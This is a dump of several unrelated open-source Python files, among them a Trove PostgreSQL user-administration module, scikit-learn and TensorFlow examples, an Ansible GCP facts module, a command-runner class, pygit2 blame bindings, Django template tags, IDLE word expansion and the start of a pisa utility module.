pgsql_query.UserQuery.drop(name=user.name),
timeout=30,
)
def get_user(self, context, username, hostname):
"""Return a serialized representation of a user with a given name.
"""
user = self._find_user(context, username)
return user.serialize() if user is not None else None
def _find_user(self, context, username):
"""Lookup a user with a given username.
Return a new Postgres user instance or raise if no match is found.
"""
results = self.query(
pgsql_query.UserQuery.get(name=username),
timeout=30,
)
if results:
return self._build_user(context, username)
return None
def user_exists(self, username):
"""Return whether a given user exists on the instance."""
results = self.query(
pgsql_query.UserQuery.get(name=username),
timeout=30,
)
return bool(results)
def change_passwords(self, context, users):
"""Change the passwords of one or more existing users.
The users parameter is a list of serialized Postgres users.
"""
for user in users:
self.alter_user(
context,
models.PostgreSQLUser.deserialize_user(user), None)
def alter_user(self, context, user, encrypt_password=None, *options):
"""Change the password and options of an existing users.
:param user: User to be altered.
:type user: PostgreSQLUser
:param encrypt_password: Store passwords encrypted if True.
Fallback to configured default
behavior if None.
:type encrypt_password: boolean
:param options: Other user options.
:type options: list
"""
LOG.info(
_("{guest_id}: Altering user {user} {with_clause}.")
.format(
guest_id=CONF.guest_id,
user=user.name,
with_clause=pgsql_query.UserQuery._build_with_clause(
'<SANITIZED>',
encrypt_password,
*options
),
)
)
self.psql(
pgsql_query.UserQuery.alter_user(
user.name,
user.password,
encrypt_password,
*options),
timeout=30,
)
def update_attributes(self, context, username, hostname, user_attrs):
"""Change the attributes of one existing user.
The username and hostname parameters are strings.
The user_attrs parameter is a dictionary in the following form:
{"password": "", "name": ""}
Each key/value pair in user_attrs is optional.
"""
user = self._build_user(context, username)
new_username = user_attrs.get('name')
new_password = user_attrs.get('password')
if new_username is not None:
self._rename_user(context, user, new_username)
# Make sure we can retrieve the renamed user.
user = self._find_user(context, new_username)
if user is None:
raise exception.TroveError(_(
"Renamed user %s could not be found on the instance.")
% new_username)
if new_password is not None:
user.password = new_password
self.alter_user(context, user)
def _rename_user(self, context, user, new_username):
"""Rename a given Postgres user and transfer all access to the
new name.
:param user: User to be renamed.
:type user: PostgreSQLUser
"""
LOG.info(
_("{guest_id}: Changing username for {old} to {new}.").format(
guest_id=CONF.guest_id,
old=user.name,
new=new_username,
)
)
# PostgreSQL handles the permission transfer itself.
self.psql(
pgsql_query.UserQuery.update_name(
old=user.name,
new=new_username,
),
timeout=30,
)
def psql(self, statement, timeout=30):
"""Execute a non-returning statement (usually DDL);
Turn autocommit ON (this is necessary for statements that cannot run
within an implicit transaction, like CREATE DATABASE).
"""
return self.__connection.execute(statement)
def query(self, query, timeout=30):
"""Execute a query and return the result set.
"""
return self.__connection.query(query)
@property
def ignore_users(self):
return cfg.get_ignored_users()
@property
def ignore_dbs(self):
return cfg.get_ignored_dbs()
class PostgresConnection(object):
def __init__(self, **connection_args):
self._connection_args = connection_args
def execute(self, statement, identifiers=None, data_values=None):
"""Execute a non-returning statement.
"""
self._execute_stmt(statement, identifiers, data_values, False,
autocommit=True)
def query(self, query, identifiers=None, data_values=None):
"""Execute a query and return the result set.
"""
return self._execute_stmt(query, identifiers, data_values, True)
def _execute_stmt(self, statement, identifiers, data_values, fetch,
autocommit=False):
if statement:
with psycopg2.connect(**self._connection_args) as connection:
connection.autocommit = autocommit
with connection.cursor() as cursor:
cursor.execute(
self._bind(statement, identifiers), data_values)
if fetch:
return cursor.fetchall()
else:
raise exception.UnprocessableEntity(_("Invalid SQL statement: %s")
% statement)
def _bind(self, statement, identifiers):
if identifiers:
return statement.format(*identifiers)
return statement
class PostgresLocalhostConnection(PostgresConnection):
HOST = 'localhost'
def __init__(self, user, password=None, port=5432):
super(PostgresLocalhostConnection, self).__init__(
user=user, password=password,
host=self.HOST, port=port)
| apache-2.0 |
BiaDarkia/scikit-learn | examples/plot_multioutput_face_completion.py | 79 | 2986 | """
==============================================
Face completion with a multi-output estimators
==============================================
This example shows the use of multi-output estimator to complete images.
The goal is to predict the lower half of a face given its upper half.
The first column of images shows true faces. The next columns illustrate
how extremely randomized trees, k nearest neighbors, linear
regression and ridge regression complete the lower half of those faces.
"""
print(__doc__)
import numpy as np
import matplotlib.pyplot as plt
from sklearn.datasets import fetch_olivetti_faces
from sklearn.utils.validation import check_random_state
from sklearn.ensemble import ExtraTreesRegressor
from sklearn.neighbors import KNeighborsRegressor
from sklearn.linear_model import LinearRegression
from sklearn.linear_model import RidgeCV
# Load the faces datasets
data = fetch_olivetti_faces()
targets = data.target
data = data.images.reshape((len(data.images), -1))
train = data[targets < 30]
test = data[targets >= 30] # Test on independent people
# Test on a subset of people
n_faces = 5
rng = check_random_state(4)
face_ids = rng.randint(test.shape[0], size=(n_faces, ))
test = test[face_ids, :]
n_pixels = data.shape[1]
# Upper half of the faces
X_train = train[:, :(n_pixels + 1) // 2]
# Lower half of the faces
y_train = train[:, n_pixels // 2:]
X_test = test[:, :(n_pixels + 1) // 2]
y_test = test[:, n_pixels // 2:]
# Fit estimators
ESTIMATORS = {
"Extra trees": ExtraTreesRegressor(n_estimators=10, max_features=32,
random_state=0),
"K-nn": KNeighborsRegressor(),
"Linear regression": LinearRegression(),
"Ridge": RidgeCV(),
}
y_test_predict = dict()
for name, estimator in ESTIMATORS.items():
estimator.fit(X_train, y_train)
y_test_predict[name] = estimator.predict(X_test)
# Plot the completed faces
image_shape = (64, 64)
n_cols = 1 + len(ESTIMATORS)
plt.figure(figsize=(2. * n_cols, 2.26 * n_faces))
plt.suptitle("Face completion with multi-output estimators", size=16)
for i in range(n_faces):
true_face = np.hstack((X_test[i], y_test[i]))
if i:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 1)
else:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 1,
title="true faces")
sub.axis("off")
sub.imshow(true_face.reshape(image_shape),
cmap=plt.cm.gray,
interpolation="nearest")
for j, est in enumerate(sorted(ESTIMATORS)):
completed_face = np.hstack((X_test[i], y_test_predict[est][i]))
if i:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j)
else:
sub = plt.subplot(n_faces, n_cols, i * n_cols + 2 + j,
title=est)
sub.axis("off")
sub.imshow(completed_face.reshape(image_shape),
cmap=plt.cm.gray,
interpolation="nearest")
plt.show()
| bsd-3-clause |
codrut3/tensorflow | tensorflow/examples/tutorials/mnist/mnist_softmax_xla.py | 37 | 3631 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Simple MNIST classifier example with JIT XLA and timelines.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import sys
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
from tensorflow.python.client import timeline
FLAGS = None
def main(_):
# Import data
mnist = input_data.read_data_sets(FLAGS.data_dir)
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
w = tf.Variable(tf.zeros([784, 10]))
b = tf.Variable(tf.zeros([10]))
y = tf.matmul(x, w) + b
# Define loss and optimizer
y_ = tf.placeholder(tf.int64, [None])
# The raw formulation of cross-entropy,
#
# tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.nn.softmax(y)),
# reduction_indices=[1]))
#
# can be numerically unstable.
#
# So here we use tf.losses.sparse_softmax_cross_entropy on the raw
# logit outputs of 'y', and then average across the batch.
cross_entropy = tf.losses.sparse_softmax_cross_entropy(labels=y_, logits=y)
train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)
config = tf.ConfigProto()
jit_level = 0
if FLAGS.xla:
# Turns on XLA JIT compilation.
jit_level = tf.OptimizerOptions.ON_1
config.graph_options.optimizer_options.global_jit_level = jit_level
run_metadata = tf.RunMetadata()
sess = tf.Session(config=config)
tf.global_variables_initializer().run(session=sess)
# Train
train_loops = 1000
for i in range(train_loops):
batch_xs, batch_ys = mnist.train.next_batch(100)
# Create a timeline for the last loop and export to json to view with
# chrome://tracing/.
if i == train_loops - 1:
sess.run(train_step,
feed_dict={x: batch_xs,
y_: batch_ys},
options=tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE),
run_metadata=run_metadata)
trace = timeline.Timeline(step_stats=run_metadata.step_stats)
with open('timeline.ctf.json', 'w') as trace_file:
trace_file.write(trace.generate_chrome_trace_format())
else:
sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})
# Test trained model
correct_prediction = tf.equal(tf.argmax(y, 1), y_)
accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
print(sess.run(accuracy,
feed_dict={x: mnist.test.images,
y_: mnist.test.labels}))
sess.close()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--data_dir',
type=str,
default='/tmp/tensorflow/mnist/input_data',
help='Directory for storing input data')
parser.add_argument(
'--xla', type=bool, default=True, help='Turn xla via JIT on')
FLAGS, unparsed = parser.parse_known_args()
tf.app.run(main=main, argv=[sys.argv[0]] + unparsed)
| apache-2.0 |
awkspace/ansible | lib/ansible/modules/cloud/google/gcp_compute_health_check_facts.py | 9 | 12633 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_health_check_facts
description:
- Gather facts for GCP HealthCheck
short_description: Gather facts for GCP HealthCheck
version_added: 2.7
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
filters:
description:
- A list of filter value pairs. Available filters are listed here U(https://cloud.google.com/sdk/gcloud/reference/topic/filters.)
- Each additional filter in the list will act be added as an AND condition (filter1
and filter2) .
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: a health check facts
gcp_compute_health_check_facts:
filters:
- name = test_object
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
'''
RETURN = '''
items:
description: List of items
returned: always
type: complex
contains:
checkIntervalSec:
description:
- How often (in seconds) to send a health check. The default value is 5 seconds.
returned: success
type: int
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
description:
description:
- An optional description of this resource. Provide this property when you create
the resource.
returned: success
type: str
healthyThreshold:
description:
- A so-far unhealthy instance will be marked healthy after this many consecutive
successes. The default value is 2.
returned: success
type: int
id:
description:
- The unique identifier for the resource. This identifier is defined by the
server.
returned: success
type: int
name:
description:
- Name of the resource. Provided by the client when the resource is created.
The name must be 1-63 characters long, and comply with RFC1035. Specifically,
the name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
timeoutSec:
description:
- How long (in seconds) to wait before claiming failure.
- The default value is 5 seconds. It is invalid for timeoutSec to have greater
value than checkIntervalSec.
returned: success
type: int
unhealthyThreshold:
description:
- A so-far healthy instance will be marked unhealthy after this many consecutive
failures. The default value is 2.
returned: success
type: int
type:
description:
- Specifies the type of the healthCheck, either TCP, SSL, HTTP or HTTPS. If
not specified, the default is TCP. Exactly one of the protocol-specific health
check field must be specified, which must match type field.
returned: success
type: str
httpHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
host:
description:
- The value of the host header in the HTTP health check request.
- If left empty (default value), the public IP on behalf of which this health
check is performed will be used.
returned: success
type: str
requestPath:
description:
- The request path of the HTTP health check request.
- The default value is /.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the HTTP health check request.
- The default value is 80.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
httpsHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
host:
description:
- The value of the host header in the HTTPS health check request.
- If left empty (default value), the public IP on behalf of which this health
check is performed will be used.
returned: success
type: str
requestPath:
description:
- The request path of the HTTPS health check request.
- The default value is /.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the HTTPS health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
tcpHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
request:
description:
- The application data to send once the TCP connection has been established
(default value is empty). If both request and response are empty, the
connection establishment alone will indicate health. The request data
can only be ASCII.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the TCP health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
sslHealthCheck:
description:
- A nested object resource.
returned: success
type: complex
contains:
request:
description:
- The application data to send once the SSL connection has been established
(default value is empty). If both request and response are empty, the
connection establishment alone will indicate health. The request data
can only be ASCII.
returned: success
type: str
response:
description:
- The bytes to match against the beginning of the response data. If left
empty (the default value), any response will indicate health. The response
data can only be ASCII.
returned: success
type: str
port:
description:
- The TCP port number for the SSL health check request.
- The default value is 443.
returned: success
type: int
portName:
description:
- Port name as defined in InstanceGroup#NamedPort#name. If both port and
port_name are defined, port takes precedence.
returned: success
type: str
proxyHeader:
description:
- Specifies the type of proxy header to append before sending data to the
backend, either NONE or PROXY_V1. The default is NONE.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest
import json
################################################################################
# Main
################################################################################
def main():
module = GcpModule(argument_spec=dict(filters=dict(type='list', elements='str')))
if not module.params['scopes']:
module.params['scopes'] = ['https://www.googleapis.com/auth/compute']
items = fetch_list(module, collection(module), query_options(module.params['filters']))
if items.get('items'):
items = items.get('items')
else:
items = []
return_value = {'items': items}
module.exit_json(**return_value)
def collection(module):
return "https://www.googleapis.com/compute/v1/projects/{project}/global/healthChecks".format(**module.params)
def fetch_list(module, link, query):
auth = GcpSession(module, 'compute')
response = auth.get(link, params={'filter': query})
return return_if_object(module, response)
def query_options(filters):
if not filters:
return ''
if len(filters) == 1:
return filters[0]
else:
queries = []
for f in filters:
# For multiple queries, all queries should have ()
if f[0] != '(' and f[-1] != ')':
queries.append("(%s)" % ''.join(f))
else:
queries.append(f)
return ' '.join(queries)
def return_if_object(module, response):
# If not found, return nothing.
if response.status_code == 404:
return None
# If no content, return nothing.
if response.status_code == 204:
return None
try:
module.raise_for_status(response)
result = response.json()
except getattr(json.decoder, 'JSONDecodeError', ValueError) as inst:
module.fail_json(msg="Invalid JSON response with error: %s" % inst)
if navigate_hash(result, ['error', 'errors']):
module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
return result
if __name__ == "__main__":
main()
| gpl-3.0 |
south-coast-science/scs_core | src/scs_core/control/command.py | 1 | 4918 | """
Created on 11 May 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
https://pymotw.com/2/subprocess/
"""
import os
from collections import OrderedDict
from subprocess import Popen, PIPE, TimeoutExpired
from scs_core.data.json import JSONable, JSONify
# --------------------------------------------------------------------------------------------------------------------
class Command(JSONable):
"""
classdocs
"""
__LIST_CMD = '?'
__PROHIBITED_TOKENS = ('-i', '--interactive', '<', '>', ';', '|')
__DEFAULT_TIMEOUT = 30.0 # seconds
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict):
if not jdict:
return None
cmd = jdict.get('cmd')
params = jdict.get('params')
stdout = jdict.get('stdout')
stderr = jdict.get('stderr')
return_code = jdict.get('ret')
datum = cls(cmd, params, stdout=stdout, stderr=stderr, return_code=return_code)
return datum
@classmethod
def construct_from_tokens(cls, tokens):
if not tokens:
return cls(None, [])
cmd = tokens[0]
params = tokens[1:]
return cls(cmd, params)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, cmd, params, stdout=None, stderr=None, return_code=None):
"""
Constructor
"""
self.__cmd = cmd # string
self.__params = params # array
self.__stdout = stdout # array of string
self.__stderr = stderr # array of string
self.__return_code = return_code # int
# ----------------------------------------------------------------------------------------------------------------
def is_valid(self, host):
try:
host.command_path()
except NotImplementedError:
return False
if set(self.params).intersection(set(Command.__PROHIBITED_TOKENS)):
return False
if self.cmd == Command.__LIST_CMD:
return True
if self.cmd not in os.listdir(host.command_path()):
return False
return True
def execute(self, host, timeout):
if not self.cmd:
return None
try:
if self.cmd == Command.__LIST_CMD:
result = self.__execute('ls', host, timeout)
self.__stdout = [JSONify.dumps(self.__stdout)]
else:
statement = ['./' + self.cmd]
statement.extend(self.params)
result = self.__execute(statement, host, timeout)
except OSError as ex:
return self.error(repr(ex))
return result
def error(self, message):
self.__stdout = []
self.__stderr = [message]
self.__return_code = 1
# ----------------------------------------------------------------------------------------------------------------
def __execute(self, statement, host, timeout):
p = Popen(statement, cwd=host.command_path(), stdout=PIPE, stderr=PIPE)
try:
stdout_bytes, stderr_bytes = p.communicate(timeout=timeout)
self.__stdout = stdout_bytes.decode().strip().splitlines()
self.__stderr = stderr_bytes.decode().strip().splitlines()
self.__return_code = p.returncode
return self.__return_code == 0
except TimeoutExpired as ex:
self.error(repr(ex))
return False
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['cmd'] = self.cmd
jdict['params'] = self.params
jdict['stdout'] = self.stdout
jdict['stderr'] = self.stderr
jdict['ret'] = self.return_code
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def cmd(self):
return self.__cmd
@property
def params(self):
return self.__params
@property
def stdout(self):
return self.__stdout
@property
def stderr(self):
return self.__stderr
@property
def return_code(self):
return self.__return_code
# ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "Command:{cmd:%s, params:%s, stdout:%s, stderr:%s, return_code:%s}" % \
(self.cmd, self.params, self.stdout, self.stderr, self.return_code)
| mit |
yarikoptic/python-pygit2 | pygit2/blame.py | 2 | 4614 | # -*- coding: utf-8 -*-
#
# Copyright 2010-2014 The pygit2 contributors
#
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License, version 2,
# as published by the Free Software Foundation.
#
# In addition to the permissions in the GNU General Public License,
# the authors give you unlimited permission to link the compiled
# version of this file into combinations with other programs,
# and to distribute those combinations without any restriction
# coming from the use of this file. (The General Public License
# restrictions do apply in other respects; for example, they cover
# modification of the file, and distribution when not linked into
# a combined executable.)
#
# This file is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; see the file COPYING. If not, write to
# the Free Software Foundation, 51 Franklin Street, Fifth Floor,
# Boston, MA 02110-1301, USA.
# Import from the future
from __future__ import absolute_import, unicode_literals
# Import from pygit2
from .errors import check_error
from .ffi import ffi, C
from .utils import to_bytes, is_string, to_str
from _pygit2 import Signature, Oid
def wrap_signature(csig):
if not csig:
return None
return Signature(ffi.string(csig.name).decode('utf-8'),
ffi.string(csig.email).decode('utf-8'),
csig.when.time, csig.when.offset, 'utf-8')
class BlameHunk(object):
@classmethod
def _from_c(cls, blame, ptr):
hunk = cls.__new__(cls)
hunk._blame = blame
hunk._hunk = ptr
return hunk
@property
def lines_in_hunk(self):
"""Number of lines"""
return self._hunk.lines_in_hunk
@property
def boundary(self):
"""Tracked to a boundary commit"""
# Casting directly to bool via cffi does not seem to work
return int(ffi.cast('int', self._hunk.boundary)) != 0
@property
def final_start_line_number(self):
"""Final start line number"""
return self._hunk.final_start_line_number
@property
def final_committer(self):
"""Final committer"""
return wrap_signature(self._hunk.final_signature)
@property
def final_commit_id(self):
return Oid(raw=bytes(ffi.buffer(ffi.addressof(self._hunk, 'final_commit_id'))[:]))
@property
def orig_start_line_number(self):
"""Origin start line number"""
return self._hunk.orig_start_line_number
@property
def orig_committer(self):
"""Original committer"""
return wrap_signature(self._hunk.orig_signature)
@property
def orig_commit_id(self):
return Oid(raw=bytes(ffi.buffer(ffi.addressof(self._hunk, 'orig_commit_id'))[:]))
@property
def orig_path(self):
"""Original path"""
path = self._hunk.orig_path
if not path:
return None
return ffi.string(path).decode()
class Blame(object):
@classmethod
def _from_c(cls, repo, ptr):
blame = cls.__new__(cls)
blame._repo = repo
blame._blame = ptr
return blame
def __del__(self):
C.git_blame_free(self._blame)
def __len__(self):
return C.git_blame_get_hunk_count(self._blame)
def __getitem__(self, index):
chunk = C.git_blame_get_hunk_byindex(self._blame, index)
if not chunk:
raise IndexError
return BlameHunk._from_c(self, chunk)
def for_line(self, line_no):
"""for_line(line_no) -> BlameHunk
Returns the blame hunk data for a given line given its number
in the current Blame.
Arguments:
line_no
Line number, starts at 1.
"""
if line_no < 0:
raise IndexError
chunk = C.git_blame_get_hunk_byline(self._blame, line_no)
if not chunk:
raise IndexError
return BlameHunk._from_c(self, chunk)
class BlameIterator(object):
def __init__(self, blame):
self._count = len(blame)
self._index = 0
self._blame = blame
def __next__(self):
if self._index >= self._count:
raise StopIteration
hunk = self._blame[self._blame]
self._index += 1
return hunk
def next(self):
return self.__next__()
| gpl-2.0 |
simpleoncall/simpleoncall | simpleoncall/templatetags/form.py | 1 | 2106 | from django import template
from simpleoncall.models import NotificationType
from simpleoncall.templatetags.icons import EvilIconNode
register = template.Library()
def pop_default(l, d):
if len(l):
return l.pop(0)
return d
class NotificationSettingRowNode(template.Node):
TYPE_OPTIONS = {
NotificationType.EMAIL: 'E-Mail',
NotificationType.SMS: 'SMS',
NotificationType.VOICE: 'Voice',
NotificationType.PUSHBULLET: 'Pushbullet',
}
def __init__(self, id, selected_type='email', selected_time=0, disabled=False):
self.id = id
self.type = selected_type
self.time = selected_time
self.disabled = disabled
def render(self, context=None):
disabled = 'disabled' if self.disabled else ''
output = (
'<div class="alert-setting-row %s" data-id="%s">'
'<select name="alert_type">'
) % (disabled, self.id)
for value, label in self.TYPE_OPTIONS.iteritems():
selected = 'selected' if value == self.type else ''
output += '<option value="%s" %s>%s</option>' % (value, selected, label)
remove_icon = EvilIconNode('ei-minus')
output += (
'</select>'
'After'
'<input type="text" name="alert_time" value="%s" maxlength="3" />'
'Minutes'
'<span class="remove-alert-row">'
'%s'
'</span>'
'</div>'
) % (self.time, remove_icon.render())
return output
@register.tag('notification_setting_row')
def notification_setting_row(parser, token):
parts = token.split_contents()
parts.pop(0)
index = pop_default(parts, 0)
selected_type = pop_default(parts, 'email')
selected_time = pop_default(parts, 0)
disabled = bool(pop_default(parts, 0))
return NotificationSettingRowNode(index, selected_type, selected_time, disabled)
@register.filter('notification_setting_row')
def notification_setting_filter(alert):
return NotificationSettingRowNode(alert.id, alert.type, alert.time, 0).render()
| mit |
maohongyuan/kbengine | kbe/src/lib/python/Lib/idlelib/AutoExpand.py | 122 | 3395 | '''Complete the current word before the cursor with words in the editor.
Each menu selection or shortcut key selection replaces the word with a
different word with the same prefix. The search for matches begins
before the target and moves toward the top of the editor. It then starts
after the cursor and moves down. It then returns to the original word and
the cycle starts again.
Changing the current text line or leaving the cursor in a different
place before requesting the next selection causes AutoExpand to reset
its state.
This is an extension file and there is only one instance of AutoExpand.
'''
import string
import re
###$ event <<expand-word>>
###$ win <Alt-slash>
###$ unix <Alt-slash>
class AutoExpand:
menudefs = [
('edit', [
('E_xpand Word', '<<expand-word>>'),
]),
]
wordchars = string.ascii_letters + string.digits + "_"
def __init__(self, editwin):
self.text = editwin.text
self.state = None
def expand_word_event(self, event):
"Replace the current word with the next expansion."
curinsert = self.text.index("insert")
curline = self.text.get("insert linestart", "insert lineend")
if not self.state:
words = self.getwords()
index = 0
else:
words, index, insert, line = self.state
if insert != curinsert or line != curline:
words = self.getwords()
index = 0
if not words:
self.text.bell()
return "break"
word = self.getprevword()
self.text.delete("insert - %d chars" % len(word), "insert")
newword = words[index]
index = (index + 1) % len(words)
if index == 0:
self.text.bell() # Warn we cycled around
self.text.insert("insert", newword)
curinsert = self.text.index("insert")
curline = self.text.get("insert linestart", "insert lineend")
self.state = words, index, curinsert, curline
return "break"
def getwords(self):
"Return a list of words that match the prefix before the cursor."
word = self.getprevword()
if not word:
return []
before = self.text.get("1.0", "insert wordstart")
wbefore = re.findall(r"\b" + word + r"\w+\b", before)
del before
after = self.text.get("insert wordend", "end")
wafter = re.findall(r"\b" + word + r"\w+\b", after)
del after
if not wbefore and not wafter:
return []
words = []
dict = {}
# search backwards through words before
wbefore.reverse()
for w in wbefore:
if dict.get(w):
continue
words.append(w)
dict[w] = w
# search onwards through words after
for w in wafter:
if dict.get(w):
continue
words.append(w)
dict[w] = w
words.append(word)
return words
def getprevword(self):
"Return the word prefix before the cursor."
line = self.text.get("insert linestart", "insert")
i = len(line)
while i > 0 and line[i-1] in self.wordchars:
i = i-1
return line[i:]
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_autoexpand', verbosity=2)
| lgpl-3.0 |
felixfontein/ansible | test/units/module_utils/test_distro.py | 35 | 1512 |
# (c) 2018 Adrian Likins <alikins@redhat.com>
# Copyright (c) 2018 Ansible Project
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# or
# Apache License v2.0 (see http://www.apache.org/licenses/LICENSE-2.0)
#
# Dual licensed so any test cases could potentially be included by the upstream project
# that module_utils/distro.py is from (https://github.com/nir0s/distro)
# Note that nir0s/distro has many more tests in it's test suite. The tests here are
# primarily for testing the vendoring.
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
from ansible.module_utils import distro
from ansible.module_utils.six import string_types
# Generic test case with minimal assertions about specific returned values.
class TestDistro():
# should run on any platform without errors, even if non-linux without any
# useful info to return
def test_info(self):
info = distro.info()
assert isinstance(info, dict), \
'distro.info() returned %s (%s) which is not a dist' % (info, type(info))
def test_linux_distribution(self):
linux_dist = distro.linux_distribution()
assert isinstance(linux_dist, tuple), \
'linux_distrution() returned %s (%s) which is not a tuple' % (linux_dist, type(linux_dist))
def test_id(self):
id = distro.id()
assert isinstance(id, string_types), 'distro.id() returned %s (%s) which is not a string' % (id, type(id))
| gpl-3.0 |
Shapes/pisa-fix-django | sx/pisa3/pisa_util.py | 1 | 26066 | # -*- coding: ISO-8859-1 -*-
# Copyright 2010 Dirk Holtwick, holtwick.it
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
__reversion__ = "$Revision: 20 $"
__author__ = "$Author: holtwick $"
__date__ = "$Date: 2007-10-09 12:58:24 +0200 (Di, 09 Okt 2007) $"
from reportlab.lib.units import inch, cm
from reportlab.lib.styles import *
from reportlab.lib.enums import *
from reportlab.lib.colors import *
from reportlab.lib.pagesizes import *
from reportlab.pdfbase import pdfmetrics
# from reportlab.platypus import *
# from reportlab.platypus.flowables import Flowable
# from reportlab.platypus.tableofcontents import TableOfContents
# from reportlab.platypus.para import Para, PageNumberObject, UNDERLINE, HotLink
import reportlab
import copy
import types
import os
import os.path
import pprint
import sys
import string
import re
import base64
import urlparse
import mimetypes
import urllib2
import urllib
import httplib
import tempfile
import shutil
rgb_re = re.compile("^.*?rgb[(]([0-9]+).*?([0-9]+).*?([0-9]+)[)].*?[ ]*$")
if not (reportlab.Version[:3]>="2.1"):
raise ImportError("Reportlab Version 2.1+ is needed!")
REPORTLAB22 = (reportlab.Version[:3]>="2.1")
# print "***", reportlab.Version, REPORTLAB22, reportlab.__file__
import logging
log = logging.getLogger("ho.pisa")
try:
import cStringIO as StringIO
except:
import StringIO
try:
import pyPdf
except:
pyPdf = None
try:
from reportlab.graphics import renderPM
except:
renderPM = None
try:
from reportlab.graphics import renderSVG
except:
renderSVG = None
def ErrorMsg():
"""
Helper to get a nice traceback as string
"""
import traceback, sys, cgi
type = value = tb = limit = None
type, value, tb = sys.exc_info()
list = traceback.format_tb(tb, limit) + traceback.format_exception_only(type, value)
return "Traceback (innermost last):\n" + "%-20s %s" % (
string.join(list[: - 1], ""),
list[ - 1])
def toList(value):
if type(value) not in (types.ListType, types.TupleType):
return [value]
